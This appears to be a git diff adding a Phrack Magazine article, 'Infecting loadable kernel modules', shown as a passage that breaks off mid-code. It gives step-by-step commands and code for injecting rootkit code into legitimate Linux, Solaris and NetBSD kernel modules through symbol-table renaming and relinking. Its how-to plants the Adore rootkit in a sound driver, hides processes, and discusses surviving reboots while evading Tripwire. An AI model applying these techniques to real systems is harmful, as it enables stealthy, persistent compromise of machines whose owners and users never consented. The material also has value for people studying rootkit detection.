+FG4CsHGqMTEMrgR0C0/Z9H/p4hbjZ2fpPne3oo7YNjnzaDN65UmYJDFUkKiFaQNb
+upTcpQESsCPvN+iaVkas37m1NATKYb8dkKdiM12iTcJ7tNotN5IDjeahNNivFv4K
+5op7A/0VBG8o348MofsE4rN20Qw4I4d6yhZwmJ8Gjfu/OPqonktfNpnEBw13RtLH
+cXEkY5GY+A2AapDCOhqDdh5Fxq9LMLKF2hzZa5JHwp6HcvrYhIyJLW8/uspVGTgP
+ZPx0Z3Cp4rKmzoLcOjyvGbAWUh0WFodK+A4xbr8bEg9PH5qCurQlUGhyYWNrIFN0
+YWZmIDxwaHJhY2tzdGFmZkBwaHJhY2sub3JnPohfBBMRAgAfBQI/LdzgBQkDFwQA
+BAsHAwIDFQIDAxYCAQIeAQIXgAAKCRC8vwVck0UfSeo1AJ42bPrG2L0Nlun1Fthn
+gYlx/9nUiACeJo5tMKlr/JcdKqeEfpNIm4GRmLq5Ag0EPy3dChAIALK9tVpuVImJ
+REXqf4GeR4RkxpAO+8Z2RolTgESW6FfJQcCM8TKeLuGWE2jGKGWKtZ68m+zxgYBK
+z+MOKFvlduktqQpyCJP/Mgdt6yy2aSEq0ZqD1hoqiGmoGdl9L6+VD2kUN6EjWCiv
+5YikjgQaenSUOmZZR0whuezxW9K4XgtLVGkgfqz82yTGwaoU7HynqhJr7UIxdsXx
+dr+y7ad1clR/OgAFg294fmffX6UkBjD5c2MiX/ax16rpDqZii1TJozeeeM7XaIAj
+5lgLLuFZctcWZjItrK6fANVjnNrEusoPnrnis4FdQi4MuYbOATNVKP00iFGlNGQN
+qqvHAsDtDTcABAsH/1zrZyBskztS88voQ2EHRR+bigpIFSlzOtHVDNnryIuF25nM
+yWV10NebrEVid/Um2xpB5qFnZNO1QdgqUTIpkKY+pqJd3mfKGepLhQq+hgSe29HP
+45V6S6ujLQ4dcaHq9PKVdhyA2TjzI/lFAZeCxtig5vtD8t5p/lifFIDDI9MrqAVR
+l1sSwfB8qWcKtMNVQWH6g2zHI1AlG0M42depD50WvdQbKWep/ESh1uP55I9UvhCl
+mQLPI6ASmwlUGq0YZIuEwuI75ExaFeIt2TJjciM5m/zXSZPJQFueB4vsTuhlQICi
+MXt5BXWyqYnDop885WR2jH5HyENOxQRad1v3yF6ITAQYEQIADAUCPy3dCgUJAxcE
+AAAKCRC8vwVck0UfSfL/AJ9ABdnRJsp6rNM4BQPKJ7shevElWACdHGebIKoidGJh
+nntgUSbqNtS5lUo=
+=FnHK
+-----END PGP PUBLIC KEY BLOCK-----
+
+phrack:~# head -22 /usr/include/std-disclaimer.h
+/*
+ *  All information in Phrack Magazine is, to the best of the ability of
+ *  the editors and contributors, truthful and accurate.  When possible,
+ *  all facts are checked, all code is compiled.  However, we are not
+ *  omniscient (hell, we don't even get paid).  It is entirely possible
+ *  something contained within this publication is incorrect in some way.
+ *  If this is the case, please drop us some email so that we can correct
+ *  it in a future issue.
+ *
+ *
+ *  Also, keep in mind that Phrack Magazine accepts no responsibility for
+ *  the entirely stupid (or illegal) things people may do with the
+ *  information contained herein.  Phrack is a compendium of knowledge,
+ *  wisdom, wit, and sass.  We neither advocate, condone nor participate
+ *  in any sort of illicit behavior.  But we will sit back and watch.
+ *
+ *
+ *  Lastly, it bears mentioning that the opinions that may be expressed in
+ *  the articles of Phrack Magazine are intellectual property of their
+ *  authors.
+ *  These opinions do not necessarily represent those of the Phrack Staff.
+ */
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack61/10.txt b/phrack61/10.txt
new file mode 100644
index 0000000..cdf12f3
--- /dev/null
+++ b/phrack61/10.txt
@@ -0,0 +1,1244 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3d, Phile #0x0a of 0x0f
+
+|=----------------=[ Infecting loadable kernel modules ]=----------------=|
+|=-----------------------------------------------------------------------=|
+|=--------------------=[ truff  <truff@projet7.org> ]=-------------------=|
+
+
+--[ Contents
+
+        1 - Introduction
+
+        2 - ELF basis
+          2.1 - The .symtab section
+          2.2 - The .strtab section
+          
+        3 - Playing with loadable kernel modules
+          3.1 - Module loading
+          3.2 - .strtab modification
+          3.3 - Code injection 
+          3.4 - Keeping stealth
+
+        4 - Real life example
+          4.1 - Lkm infecting mini-howto
+          4.2 - I will survive (a reboot)
+          
+        5 - What about other systems ? 
+          5.1 - Solaris
+          5.2 - *BSD
+            5.2.1 - FreeBSD
+            5.2.2 - NetBSD
+            5.2.3 - OpenBSD
+        
+        6 - Conclusion
+
+        7 - Greetings
+
+        8 - References
+
+        9 - Code
+          9.1 - ElfStrChange
+          9.2 - Lkminject
+
+
+
+
+--[ 1 - Introduction
+  
+  Since a few years we have seen a lot of rootkits using loadable kernel
+modules. Is this a fashion ? not really, lkm's are widely used because they
+are powerfull: you can hide files, processes and do other nice things. 
+The first rootkits using lkm's could be easily detected because they 
+where listed when issuing a lsmod. We have seen lots of techniques to hide
+modules, like the one used in Plaguez's paper [1] or the more tricky used
+in the Adore Rootkit [2]. A few years later we have seen other techniques
+based on the modification of the kernel memory image using /dev/kmem [3].
+Finally, a technique of static kernel patching was presented to us in [4].
+This one solves an important problem: the rootkit will be reloaded after a
+reboot. 
+  
+  The goal of this paper is to describe a new technique used to hide lkm's
+and to ensure us that they will be reloaded after a reboot. We are going
+to see how to do this by infecting a kernel module used by the system. We
+will focus on Linux kernel x86 2.4.x series but this technique can be 
+applied to other operating systems that use the ELF format.  Some knowledge
+is necessary to understand this technique. Kernel modules are ELF object 
+files, we will thus study the ELF format focusing on some particular parts 
+related to the symbol naming in an ELF object file. After that, we will 
+study the mechanisms wich are used to load a module to give us some 
+knowledge on the technique which will permit to inject code into a kernel 
+module. Finally, we will see how we can inject a module into another one in 
+real life. 
+  
+
+
+--[ 2 - ELF Basis
+  
+  The Executable and Linking Format (ELF) is the executable file format
+used on the Linux operating system. We are going to have a look at the part
+of this format which interests us and which will be useful later (Read [1]
+to have a full description of the ELF format).  When linking two ELF 
+objects the linker needs to know some data refering to the symbols 
+contained in each object. Each ELF object (lkm's for example) contains two
+sections whose role is to store structures of information describing each 
+symbol. We are going to study them and to extract some usefull ideas for 
+the infection of a kernel module.
+ 
+  
+----[ 2.1 - The .symtab section  
+  
+  This section is a tab of structures that contains data requiered by the
+linker to use symbols contained in a ELF object file. This structure is
+defined in the file /usr/include/elf.h:  
+
+/* Symbol table entry.  */
+
+typedef struct
+{
+  Elf32_Word	st_name;	/* Symbol name (string tbl index) */
+  Elf32_Addr	st_value;	/* Symbol value */
+  Elf32_Word	st_size;	/* Symbol size */
+  unsigned char	st_info;	/* Symbol type and binding */
+  unsigned char	st_other;	/* Symbol visibility */
+  Elf32_Section	st_shndx;	/* Section index */
+} Elf32_Sym;
+
+ The only field which will interest us later is st_name. This field is an
+index of the .strtab section where the name of the symbol is stored.
+
+
+----[ 2.2 - The .strtab section
+
+  The .strtab section is a tab of null terminated strings. As we saw above,
+the st_name field of the Elf32_Sym structure is an index in the .strtab
+section, we can thus easily obtain the offset of the string which contains
+the name of the symbol by the following formula:
+  
+  offset_sym_name = offset_strtab + st_name 
+
+  offset_strtab is the offset of the .strtab section from the beginning of
+the file. It is obtained by the section name resolution mechanism which I
+will not describe here because it does not bring any interest to the
+covered subject. This mechanism is fully described in [5] and implemented
+in the code (paragraph 9.1).
+ 
+  We can then deduce that the name of a symbol in a ELF object can be
+easily accessed and thus easily modified. However a rule must be complied
+with to carry out a modification. We saw that the .strtab section is a
+succession of null terminated strings, this implies a restriction on the
+new name of a symbol after a modification: the length of the new name of
+the symbol will have to be lower or equal to that of the original name
+overwise it will overflow the name of the next symbol in the .strtab
+section.
+ 
+  We will see thereafter that the simple modification of a symbol's name
+will lead us to the modification of the normal operation of a kernel module
+and finally to the infection of a module by another one.
+
+
+--[ 3 - Playing with loadable kernel modules
+  
+  The purpose of the next section is to show the code which dynamically
+loads a module. With this concepts in mind, we will be able to foresee the
+technique which will lead us to inject code into the module.
+
+
+----[ 3.1 - Module Loading
+
+  Kernel modules are loaded with the userland utility insmod which is part
+of the modutils[6] package. The interesting stuff is located in the
+init_module() functions of the insmod.c file.
+  
+static int init_module(const char *m_name, struct obj_file *f,
+        unsigned long m_size, const char *blob_name,
+        unsigned int noload, unsigned int flag_load_map)
+{
+(1)     struct module *module;
+        struct obj_section *sec;
+        void *image;
+        int ret = 0;
+        tgt_long m_addr;
+
+        ....
+
+(2)     module->init = obj_symbol_final_value(f, 
+                obj_find_symbol(f, "init_module"));
+(3)     module->cleanup = obj_symbol_final_value(f,
+                obj_find_symbol(f, "cleanup_module"));
+
+        ....
+
+        if (ret == 0 && !noload) {
+                fflush(stdout);         /* Flush any debugging output */
+(4)             ret = sys_init_module(m_name, (struct module *) image);
+                if (ret) {
+                        error("init_module: %m");
+                        lprintf(
+      "Hint: insmod errors can be caused by incorrect module parameters, "
+      "including invalid IO or IRQ parameters.\n"
+      "You may find more information in syslog or the output from dmesg");
+                }
+        }
+ 
+  This function is used (1) to fill a struct module which contains the
+necessary data to load the module. The interestings fields are init_module
+and cleanup_module which are functions pointers pointing respectively to
+the init_module() and cleanup_module() of the module being loaded.  The
+obj_find_symbol() function (2) extracts a struct symbol by traversing the
+symbol table and looking for the one whose name is init_module. This struct
+is passed to the obj_symbol_final_value() which extracts the address of the
+init_module function from the struct symbol. The same operation is then
+carried out (3) for the function cleanup_module(). It is necessary to keep
+in mind that the functions which will be called when initializing and
+terminating the module are those whose entry in the .strtab section
+corresponds respectively to init_module and cleanup_module.
+  
+  When the struct module is completely filled in (4) the sys_init_module()
+syscall is called to let the kernel load the module.
+
+  Here is the interesting part of the sys_init_module() syscall wich is
+called during module loading. This function's code is located in the
+/usr/src/linux/kernel/module.c file:
+
+asmlinkage long
+sys_init_module(const char *name_user, struct module *mod_user)
+{
+        struct module mod_tmp, *mod;
+        char *name, *n_name, *name_tmp = NULL;
+        long namelen, n_namelen, i, error;
+        unsigned long mod_user_size;
+        struct module_ref *dep;
+                                        
+        /* Lots of sanity checks */
+        .....
+        /* Ok, that's about all the sanity we can stomach; copy the rest.*/
+
+(1)     if (copy_from_user((char *)mod+mod_user_size,
+                           (char *)mod_user+mod_user_size,
+                           mod->size-mod_user_size)) {
+                error = -EFAULT;
+                goto err3;
+        }
+
+        /* Other sanity checks */
+
+        ....
+                
+        /* Initialize the module.  */
+        atomic_set(&mod->uc.usecount,1);
+        mod->flags |= MOD_INITIALIZING;
+(2)     if (mod->init && (error = mod->init()) != 0) {
+                atomic_set(&mod->uc.usecount,0);
+                mod->flags &= ~MOD_INITIALIZING;
+                if (error > 0)  /* Buggy module */
+                        error = -EBUSY;
+                goto err0;
+        }
+        atomic_dec(&mod->uc.usecount);
+ 
+  After a few sanity checks, the struct module is copied from userland to
+kernelland by calling (1) copy_from_user(). Then (2) the init_module()
+function of the module being loaded is called using the mod->init() funtion
+pointer wich has been filled by the insmod utility.
+
+
+----[ 3.2 - .strtab modification
+
+  We have seen that the address of the module's init function is located
+using a string in the .strtab section. The modification of this string will
+allow us to execute another function than init_module() when the module is
+loaded. 
+  There are a few ways to modify an entry of the .strtab section. The 
+-wrap option of ld can be used to do it but this option isn't compatible 
+with the -r option that we will need later (paragraph 3.3). We will see in 
+paragraph 5.1 how to use xxd to do the work. I have coded a tool 
+(paragraph 9.1) to automate this task.
+
+Here's a short example:
+  
+$ cat test.c
+#define MODULE
+#define __KERNEL__
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+
+int init_module(void) 
+{
+  printk ("<1> Into init_module()\n");
+  return 0;
+}
+
+int evil_module(void) 
+{
+  printk ("<1> Into evil_module()\n");
+  return 0;
+}
+
+int cleanup_module(void) 
+{
+  printk ("<1> Into cleanup_module()\n");
+  return 0;
+}
+
+$ cc -O2 -c test.c 
+
+  Let's have a look at the .symtab and .strtab sections:
+  
+$ objdump -t test.o 
+
+test.o:     file format elf32-i386
+
+SYMBOL TABLE:
+0000000000000000 l    df *ABS*  0000000000000000 test.c
+0000000000000000 l    d  .text  0000000000000000 
+0000000000000000 l    d  .data  0000000000000000 
+0000000000000000 l    d  .bss   0000000000000000 
+0000000000000000 l    d  .modinfo  0000000000000000 
+0000000000000000 l     O .modinfo  0000000000000016 __module_kernel_version
+0000000000000000 l    d  .rodata   0000000000000000 
+0000000000000000 l    d  .comment  0000000000000000 
+0000000000000000 g     F .text  0000000000000014 init_module
+0000000000000000         *UND*  0000000000000000 printk
+0000000000000014 g     F .text  0000000000000014 evil_module
+0000000000000028 g     F .text  0000000000000014 cleanup_module
+
+  We are now going to modify 2 entries of the .strtab section to make the
+evil_module symbol's name become init_module. First we must rename the
+init_module symbol because 2 symbols of the same nature can't have the same
+name in the same ELF object. The following operations are carried out:
+  
+		rename
+1)  init_module  ---->  dumm_module
+2)  evil_module  ---->  init_module
+
+
+$ ./elfstrchange test.o init_module dumm_module
+[+] Symbol init_module located at 0x3dc
+[+] .strtab entry overwriten with dumm_module
+
+$ ./elfstrchange test.o evil_module init_module
+[+] Symbol evil_module located at 0x3ef
+[+] .strtab entry overwriten with init_module
+
+$ objdump -t test.o 
+
+test.o:     file format elf32-i386
+
+SYMBOL TABLE:
+0000000000000000 l    df *ABS*  0000000000000000 test.c
+0000000000000000 l    d  .text  0000000000000000 
+0000000000000000 l    d  .data  0000000000000000 
+0000000000000000 l    d  .bss   0000000000000000 
+0000000000000000 l    d  .modinfo  0000000000000000 
+0000000000000000 l     O .modinfo  0000000000000016 __module_kernel_version
+0000000000000000 l    d  .rodata   0000000000000000 
+0000000000000000 l    d  .comment  0000000000000000 
+0000000000000000 g     F .text  0000000000000014 dumm_module
+0000000000000000         *UND*  0000000000000000 printk
+0000000000000014 g     F .text  0000000000000014 init_module
+0000000000000028 g     F .text  0000000000000014 cleanup_module
+
+
+# insmod test.o 
+# tail -n 1 /var/log/kernel 
+May  4 22:46:55 accelerator kernel:  Into evil_module()
+
+  As we can see, the evil_module() function has been called instead of
+init_module().
+
+  
+----[ 3.3 - Code injection 
+
+  The preceding tech makes it possible to execute a function instead of
+another one, however this is not very interesting. It will be much better
+to inject external code into the module. This can be *easily* done by using
+the wonderfull linker: ld. 
+
+$ cat original.c
+#define MODULE
+#define __KERNEL__
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+
+int init_module(void) 
+{
+  printk ("<1> Into init_module()\n");
+  return 0;
+}
+
+int cleanup_module(void) 
+{
+  printk ("<1> Into cleanup_module()\n");
+  return 0;
+}
+
+$ cat inject.c
+#define MODULE
+#define __KERNEL__
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+
+
+int inje_module (void)
+{
+  printk ("<1> Injected\n");
+  return 0;
+}
+
+$ cc -O2 -c original.c
+$ cc -O2 -c inject.c
+
+
+  Here starts the important part. The injection of the code is not a
+problem because kernel modules are relocatable ELF object files. This type
+of objects can be linked together to share symbols and complete each other.
+However a rule must be complied: the same symbol can't exist in several
+modules which are linked together.  We use ld with the -r option to make a
+partial link wich creates an object of the same nature as the objects wich
+are linked. This will create a module which can be loaded by the kernel.
+
+$ ld -r original.o inject.o -o evil.o
+$ mv evil.o original.o 
+$ objdump -t original.o 
+
+original.o:     file format elf32-i386
+
+SYMBOL TABLE:
+0000000000000000 l    d  .text  0000000000000000 
+0000000000000000 l    d  *ABS*  0000000000000000 
+0000000000000000 l    d  .rodata   0000000000000000 
+0000000000000000 l    d  .modinfo  0000000000000000 
+0000000000000000 l    d  .data  0000000000000000 
+0000000000000000 l    d  .bss   0000000000000000 
+0000000000000000 l    d  .comment  0000000000000000 
+0000000000000000 l    d  *ABS*  0000000000000000 
+0000000000000000 l    d  *ABS*  0000000000000000 
+0000000000000000 l    d  *ABS*  0000000000000000 
+0000000000000000 l    df *ABS*  0000000000000000 original.c
+0000000000000000 l     O .modinfo  0000000000000016 __module_kernel_version
+0000000000000000 l    df *ABS*  0000000000000000 inject.c
+0000000000000016 l     O .modinfo  0000000000000016 __module_kernel_version
+0000000000000014 g     F .text  0000000000000014 cleanup_module
+0000000000000000 g     F .text  0000000000000014 init_module
+0000000000000000         *UND*  0000000000000000 printk
+0000000000000028 g     F .text  0000000000000014 inje_module
+
+
+  The inje_module() function has been linked into the module. Now we are
+going to modify the .strtab section to make inje_module() be called instead
+of init_module(). 
+
+
+$ ./elfstrchange original.o init_module dumm_module
+[+] Symbol init_module located at 0x4a8
+[+] .strtab entry overwriten with dumm_module
+
+$ ./elfstrchange original.o inje_module init_module
+[+] Symbol inje_module located at 0x4bb
+[+] .strtab entry overwriten with init_module
+
+
+  Let's fire it up:
+  
+# insmod original.o
+# tail -n 1 /var/log/kernel 
+May 14 20:37:02 accelerator kernel:  Injected
+
+  And the magic occurs :)
+
+
+----[ 3.4 - Keeping stealth
+
+  Most of the time, we will infect a module which is in use. If we replace
+the init_module() function with another one, the module loses its original
+purpose for our profit. However, if the infected module does not work
+properly it can be easily detected.  But there is a solution that permits
+to inject code into a module without modifying its regular behaviour. After
+the .strtab hack, the real init_module() function is named dumm_module. If
+we put a call to dumm_module() into our evil_module() function, the real
+init_module() function will be called at initialization and the module will
+keep its regular behaviour.
+  
+                 replace 
+    init_module  ------>  dumm_module
+    inje_module  ------>  init_module (will call dumm_module) 
+  
+  
+$ cat stealth.c
+#define MODULE
+#define __KERNEL__
+
+#include <linux/module.h>
+#include <linux/kernel.h>
+
+
+int inje_module (void)
+{
+  dumm_module ();
+  printk ("<1> Injected\n");
+  return 0;
+}
+
+$ cc -O2 -c stealth.c
+$ ld -r original.o stealth.o -o evil.o
+$ mv evil.o original.o 
+$ ./elfstrchange original.o init_module dumm_module
+[+] Symbol init_module located at 0x4c9
+[+] .strtab entry overwriten with dumm_module
+
+$ ./elfstrchange original.o inje_module init_module
+[+] Symbol inje_module located at 0x4e8
+[+] .strtab entry overwriten with init_module
+
+# insmod original.o 
+# tail -n 2 /var/log/kernel 
+May 17 14:57:31 accelerator kernel:  Into init_module()
+May 17 14:57:31 accelerator kernel:  Injected
+
+
+  Perfect, the injected code is executed after the regular code so that the
+modification is stealth.
+
+
+--[ 4 - Real life example
+
+  The method used to modify init_module() in the preceding parts can be
+applied without any problem to the cleanup_module() function. Thus, we can
+plan to inject a complete module into another one.  I've injected the well
+known Adore[2] rootkit into my sound driver (i810_audio.o) with a rather
+simple handling. 
+  
+----[ 4.1 - Lkm infecting mini-howto
+
+1) We have to slightly modify adore.c
+
+  * Insert a call to dumm_module() in the init_module() function's code
+  * Insert a call to dummcle_module() in the cleanup_module() module 
+    function's code
+  * Replace the init_module function's name with evil_module
+  * Replace the cleanup_module function's name with evclean_module
+  
+  
+2) Compile adore using make
+
+
+3) Link adore.o with i810_audio.o
+
+   ld -r i810_audio.o adore.o -o evil.o
+   
+   If the module is already loaded, you have to remove it:
+   rmmod i810_audio
+   
+   mv evil.o i810_audio.o
+   
+
+4) Modify the .strtab section
+                  
+                 replace
+  init_module    ------> dumm_module
+  evil_module    ------> init_module (will call dumm_module)
+
+  cleanup_module ------> evclean_module
+  evclean_module ------> cleanup_module (will call evclean_module)
+
+$ ./elfstrchange i810_audio.o init_module dumm_module 
+[+] Symbol init_module located at 0xa2db
+[+] .strtab entry overwriten with dumm_module
+
+$ ./elfstrchange i810_audio.o evil_module init_module
+[+] Symbol evil_module located at 0xa4d1
+[+] .strtab entry overwriten with init_module
+
+$ ./elfstrchange i810_audio.o cleanup_module dummcle_module
+[+] Symbol cleanup_module located at 0xa169
+[+] .strtab entry overwriten with dummcle_module
+
+$ ./elfstrchange i810_audio.o evclean_module cleanup_module
+[+] Symbol evclean_module located at 0xa421
+[+] .strtab entry overwriten with cleanup_module
+
+
+5) Load and test the module
+
+# insmod i810_audio
+# ./ava     
+Usage: ./ava {h,u,r,R,i,v,U} [file, PID or dummy (for U)]
+
+       h hide file
+       u unhide file
+       r execute as root
+       R remove PID forever
+       U uninstall adore
+       i make PID invisible
+       v make PID visible
+
+# ps
+  PID TTY          TIME CMD
+ 2004 pts/3    00:00:00 bash
+ 2083 pts/3    00:00:00 ps
+ 
+# ./ava i 2004
+Checking for adore  0.12 or higher ...
+Adore 0.53 installed. Good luck.
+Made PID 2004 invisible.
+
+root@accelerator:/home/truff/adore# ps
+  PID TTY          TIME CMD
+#     
+
+Beautifull :) I've coded a little shell script (paragraph 9.2) which does
+some part of the work for lazy people.
+
+
+----[ 4.2 - I will survive (a reboot)
+
+  When the module is loaded, we have two options that have pros and cons: 
+  
+  * Replace the real module located in /lib/modules/ by our infected one. 
+    This will ensure us that our backdoor code will be reloaded after a 
+    reboot. But, if we do that we can be detected by a HIDS (Host Intrusion
+    Detection System) like Tripwire [7]. However, a kernel module is not 
+    an executable nor a suid file, so it won't be detected unless the HIDS 
+    is configured to be paranoid.
+
+  * Let the real kernel module unchanged in /lib/modules and delete our
+    infected module. Our module will be removed when rebooting, but it 
+    won't be detected by a HIDS that looks for changed files.
+  
+  
+
+--[ 5 - What about other systems ?
+  
+----[ 5.1 - Solaris
+
+  I've used a basic kernel module from [8] to illustrate this example. 
+Solaris kernel modules use 3 principal functions: 
+  - _init will be called at module initialisation
+  - _fini will be called at module cleanup
+  - _info prints info about the module when issuing a modinfo
+  
+$ uname -srp
+SunOS 5.7 sparc
+
+$ cat mod.c
+#include <sys/ddi.h>
+#include <sys/sunddi.h>
+#include <sys/modctl.h>
+
+extern struct mod_ops mod_miscops;
+
+static struct modlmisc modlmisc = {
+        &mod_miscops,
+        "Real Loadable Kernel Module",
+};
+
+static struct modlinkage modlinkage = {
+        MODREV_1,  
+        (void *)&modlmisc,
+        NULL
+};
+
+int _init(void)
+{
+        int i;
+        if ((i = mod_install(&modlinkage)) != 0)
+                cmn_err(CE_NOTE,"Could not install module\n");
+        else
+                cmn_err(CE_NOTE,"mod: successfully installed");
+        return i;
+}
+
+int _info(struct modinfo *modinfop)
+{
+        return (mod_info(&modlinkage, modinfop));
+}
+
+int _fini(void)
+{
+        int i;
+        if ((i = mod_remove(&modlinkage)) != 0)
+                cmn_err(CE_NOTE,"Could not remove module\n");
+        else
+                cmn_err(CE_NOTE,"mod: successfully removed");
+        return i;
+}
+
+  
+$ gcc -m64 -D_KERNEL -DSRV4 -DSOL2 -c mod.c
+$ ld -r -o mod mod.o
+$ file mod
+mod:            ELF 64-bit MSB relocatable SPARCV9 Version 1
+
+
+  As we have seen in the Linux case, the code we are going to inject must
+contains a call to the real init function to make the module keeps its 
+regular behaviour. However, we are going to face a problem: if we modify 
+the .strtab section after the link operation, the dynamic loader doesn't 
+find the _dumm() function and the module can't be loaded. I've not 
+invistigated a lot into this problem but i think that the dynamic loader
+on Solaris doesn't looks for undefined symbols into the module itself.
+However, this problem can be easily solved. If we change the real _init 
+.strtab entry to _dumm before the link operation, everything works well. 
+
+
+$ readelf -S mod
+There are 10 section headers, starting at offset 0x940:
+
+Section Headers:
+  [Nr] Name              Type             Address           Offset
+       Size              EntSize          Flags  Link  Info  Align
+  [ 0]                   NULL             0000000000000000  00000000
+       0000000000000000  0000000000000000           0     0     0
+  [ 1] .text             PROGBITS         0000000000000000  00000040
+       0000000000000188  0000000000000000  AX       0     0     4
+  [ 2] .rodata           PROGBITS         0000000000000000  000001c8
+       000000000000009b  0000000000000000   A       0     0     8
+  [ 3] .data             PROGBITS         0000000000000000  00000268
+       0000000000000050  0000000000000000  WA       0     0     8
+  [ 4] .symtab           SYMTAB           0000000000000000  000002b8
+       0000000000000210  0000000000000018           5     e     8
+  [ 5] .strtab           STRTAB           0000000000000000  000004c8
+       0000000000000065  0000000000000000           0     0     1
+  [ 6] .comment          PROGBITS         0000000000000000  0000052d
+       0000000000000035  0000000000000000           0     0     1
+  [ 7] .shstrtab         STRTAB           0000000000000000  00000562
+       000000000000004e  0000000000000000           0     0     1
+  [ 8] .rela.text        RELA             0000000000000000  000005b0
+       0000000000000348  0000000000000018           4     1     8
+  [ 9] .rela.data        RELA             0000000000000000  000008f8
+       0000000000000048  0000000000000018           4     3     8
+Key to Flags:
+  W (write), A (alloc), X (execute), M (merge), S (strings)
+  I (info), L (link order), G (group), x (unknown)
+  O (extra OS processing required) o (OS specific), p (processor specific)
+
+  
+  The .strtab section starts at offset 0x4c8 and has a size of 64 bytes. 
+We are going to use vi and xxd as an hex editor. Load the module into vi
+with: vi mod. After that use :%!xxd to convert the module into hex values.
+You will see something like this:
+
+00004c0: 0000 0000 0000 0000 006d 6f64 006d 6f64  .........mod.mod
+00004d0: 2e63 006d 6f64 6c69 6e6b 6167 6500 6d6f  .c.modlinkage.mo
+00004e0: 646c 6d69 7363 006d 6f64 5f6d 6973 636f  dlmisc.mod_misco
+00004f0: 7073 005f 696e 666f 006d 6f64 5f69 6e73  ps._info.mod_ins
+0000500: 7461 6c6c 005f 696e 6974 006d 6f64 5f69  tall._init.mod_i
+                        ^^^^^^^^^
+
+  We modify 4 bytes to replace _init by _dumm.
+
+00004c0: 0000 0000 0000 0000 006d 6f64 006d 6f64  .........mod.mod
+00004d0: 2e63 006d 6f64 6c69 6e6b 6167 6500 6d6f  .c.modlinkage.mo
+00004e0: 646c 6d69 7363 006d 6f64 5f6d 6973 636f  dlmisc.mod_misco
+00004f0: 7073 005f 696e 666f 006d 6f64 5f69 6e73  ps._info.mod_ins
+0000500: 7461 6c6c 005f 6475 6d6d 006d 6f64 5f69  tall._init.mod_i
+                        ^^^^^^^^^
+  We use :%!xxd -r to recover the module from hex values, then we save 
+and exit :wq . After that we can verify that the replacement is 
+successfull.
+
+$ objdump -t mod
+
+mod:     file format elf64-sparc
+
+SYMBOL TABLE:
+0000000000000000 l    df *ABS*  0000000000000000 mod
+0000000000000000 l    d  .text  0000000000000000
+0000000000000000 l    d  .rodata        0000000000000000
+0000000000000000 l    d  .data  0000000000000000
+0000000000000000 l    d  *ABS*  0000000000000000
+0000000000000000 l    d  *ABS*  0000000000000000
+0000000000000000 l    d  .comment       0000000000000000
+0000000000000000 l    d  *ABS*  0000000000000000
+0000000000000000 l    d  *ABS*  0000000000000000
+0000000000000000 l    d  *ABS*  0000000000000000
+0000000000000000 l    df *ABS*  0000000000000000 mod.c
+0000000000000010 l     O .data  0000000000000040 modlinkage
+0000000000000000 l     O .data  0000000000000010 modlmisc
+0000000000000000         *UND*  0000000000000000 mod_miscops
+00000000000000a4 g     F .text  0000000000000040 _info
+0000000000000000         *UND*  0000000000000000 mod_install
+0000000000000000 g     F .text  0000000000000188 _dumm
+0000000000000000         *UND*  0000000000000000 mod_info
+0000000000000000         *UND*  0000000000000000 mod_remove
+00000000000000e4 g     F .text  0000000000000188 _fini
+0000000000000000         *UND*  0000000000000000 cmn_err
+
+
+  The _init symbol has been replaced by _dumm. Now we can directly inject 
+a function which name is _init without any problem.
+
+$ cat evil.c
+int _init(void)
+{
+        _dumm ();
+        cmn_err(1,"evil: successfully installed");
+        return 0;
+}
+            
+$ gcc -m64 -D_KERNEL -DSRV4 -DSOL2 -c inject.c
+$ ld -r -o inject inject.o
+
+  The injecting part using ld:
+  
+$ ld -r -o evil mod inject
+
+  Load the module:
+  
+# modload evil
+# tail -f /var/adm/messages
+Jul 15 10:58:33 luna unix: NOTICE: mod: successfully installed
+Jul 15 10:58:33 luna unix: NOTICE: evil: successfully installed
+
+
+  The same operation can be carried out for the _fini function to inject
+a complete module into another one.
+
+
+
+----[ 5.2 - *BSD
+
+------[ 5.2.1 - FreeBSD
+
+% uname -srm
+FreeBSD 4.8-STABLE i386
+
+% file /modules/daemon_saver.ko 
+daemon_saver.ko: ELF 32-bit LSB shared object, Intel 80386, version 1 
+(FreeBSD), not stripped
+
+  As we can see, FreeBSD kernel modules are shared objects.Thus, we can't 
+use ld to link aditionnal code into the module. Furthermore, the mechanism
+which is in use to load a module is completely different from the one used
+on Linux or Solaris systems. You can have a look to it in
+/usr/src/sys/kern/kern_linker.c . Any name can be used for the init/cleanup
+function. At initialisation the loader finds the address of the init
+function into a structure stored in the .data section. Then the .strtab
+hack can't be used too.
+
+
+------[ 5.2.2 - NetBSD
+
+$ file nvidia.o
+nvidia.o: ELF 32-bit LSB relocatable, Intel 80386, version 1 
+(SYSV), not stripped
+
+  We can inject code into a NetBSD kernel module because it's a 
+relocatable ELF object. When modload loads a kernel module it links it
+with the kernel and execute the code placed at the entry point of the
+module (located in the ELF header). 
+  After the link operation we can change this entry point, but it is not
+necessary because modload has a special option (-e) that allows to tell 
+it which symbol to use for the entry point. 
+  
+  Here's the example module we are going to infect:
+  
+$ cat gentil_lkm.c
+#include <sys/cdefs.h>
+#include <sys/param.h>
+#include <sys/ioctl.h>
+#include <sys/systm.h>
+#include <sys/conf.h>
+#include <sys/lkm.h>
+
+MOD_MISC("gentil");
+
+int	gentil_lkmentry(struct lkm_table *, int, int);
+int	gentil_lkmload(struct lkm_table *, int);
+int	gentil_lkmunload(struct lkm_table *, int);
+int	gentil_lkmstat(struct lkm_table *, int);
+
+int gentil_lkmentry(struct lkm_table *lkmt, int cmd, int ver)
+{
+	DISPATCH(lkmt, cmd, ver, gentil_lkmload, gentil_lkmunload,
+	    gentil_lkmstat);
+}
+
+int gentil_lkmload(struct lkm_table *lkmt, int cmd)
+{
+	printf("gentil: Hello, world!\n");
+	return (0);
+}
+
+int gentil_lkmunload(struct lkm_table *lkmt, int cmd)
+{
+	printf("gentil: Goodbye, world!\n");
+	return (0);
+}
+
+int gentil_lkmstat(struct lkm_table *lkmt, int cmd)
+{
+	printf("gentil: How you doin', world?\n");
+	return (0);
+}
+
+
+  Here's the code that will be injected:
+  
+$ cat evil_lkm.c
+#include <sys/cdefs.h>
+#include <sys/param.h>
+#include <sys/ioctl.h>
+#include <sys/systm.h>
+#include <sys/conf.h>
+#include <sys/lkm.h>
+
+int	gentil_lkmentry(struct lkm_table *, int, int);
+
+int
